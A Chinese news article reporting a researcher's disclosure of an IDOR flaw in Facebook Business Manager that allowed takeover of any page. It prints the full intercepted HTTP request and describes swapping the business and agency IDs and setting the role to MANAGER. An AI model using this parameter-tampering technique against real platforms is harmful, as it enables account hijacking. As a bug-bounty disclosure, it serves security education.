10秒内攻破FaceBook页面需要什么秘诀？

一个印度研究员发现了Facebook商业管理系统的严重漏洞，能够用来攻击任何页面。

印度研究员 Arun Sureshkumar 发现了Facebook商业管理系统一个严重漏洞，能够用来攻击任何页面。

商业管理系统是客户用来管理用户资产的组件，包括页面和广告账号，Facebook商业管理系统允许超级管理员共享页面和账号的权限。

在分析这项技术之前，我先介绍一下不安全直接对象引用的概念。根据OWASP项目提供的定义，当应用提供基于用户输入的直接对象访问时会产生不安全的直接对象引用。这个漏洞能够让攻击者绕过认证直接访问系统的资源。

不安全对象引用允许攻击者绕过认证直接访问资源，通过修改直接指向对象参数的值。这些资源可能是数据库，文件系统等等。这将导致用户通过输入可以检索对象并且不需要认证校验。

Sureshkumar 利用Facebook商业管理系统的IDOR漏洞能在10秒内拿下任何Facebook的页面。

Sureshkumar用他的Facebook账号 (ID=907970555981524) 添加了一个合作伙伴，他用的测试账号 ID 为991079870975788。攻击者用Burp Suit来截获请求，这个工具能够修改请求。

下面是攻击者公布的请求：

POST/business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh;Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/52.0.2743.116 Safari/537.36
Content-Type:application/x-www-form-urlencoded
Accept: */*
Referer:https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2;datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n;lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837;fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I;csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2;presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC;act=1472469233458%2F6
parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

他修改目标页面‘asset id’的值，同时交换‘parent_business_id’和‘agency_id’的值。同时将角色更改为’MANAGER’。

通过这个简单的修改，Sureshkumar演示了攻击Facebook页面是可能的。他获取了管理员权限。

安全专家在2016年8月29号向Facebook报告了这个漏洞，Facebook研究了这个漏洞并由此发现了平台上的另一个漏洞。Sureshkumar 因此也获得了16000美元的奖励。